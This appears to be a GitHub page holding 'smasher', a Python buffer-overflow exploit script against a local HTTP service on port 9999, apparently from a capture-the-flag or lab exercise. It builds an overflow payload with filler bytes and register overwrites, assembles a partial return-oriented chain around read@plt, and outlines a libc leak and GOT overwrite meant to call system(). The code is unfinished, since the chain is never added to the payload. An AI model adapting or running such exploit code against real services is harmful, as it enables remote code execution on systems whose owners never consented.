-
Notifications
You must be signed in to change notification settings - Fork 0
smasher
#!/usr/bin/python
import os, sys, socket
import struct
import requests
#cmd = sys.argv[1]+"\0"
cmd = 'ls'
#payload for Option 1: GET request, needs some filler or err - 'A' * 4 to be taken off buffer
payload = r’http://localhost:9999/\AAAA'
#Payload for Option 2: CURL
#payload = ''
#filler - fill buffer with A’s , thought this would be 536 - 4, but turns out to be 535
payload += 'A' * (535 - 4)
#overwrite RBX
payload += 'B' * 8
#overwrite RBP
payload += 'C' * 8
#write stdin to .dynamic using read@plt (0000000000400cf0 <read@plt>:)
someother = struct.pack("<I", 0x000400cf0) #read() call loc
someother += struct.pack("<I", 0x000401787) #PPPR
someother += struct.pack("<I", 0) #stdin
someother += struct.pack("<I", 0x000602e28) #.dynamic addr
someother += struct.pack("<I", len(cmd)) #len of cmd
#leak address of read() in randomised libc
#call read@plt to overwrite the ptr stored in GOT
#call read@plt with address of system() in libc
#padding - continue filler, writing into RSP
payload += 'D' * 150
r = requests.get(payload)
print(r.status_code)
print(len(payload))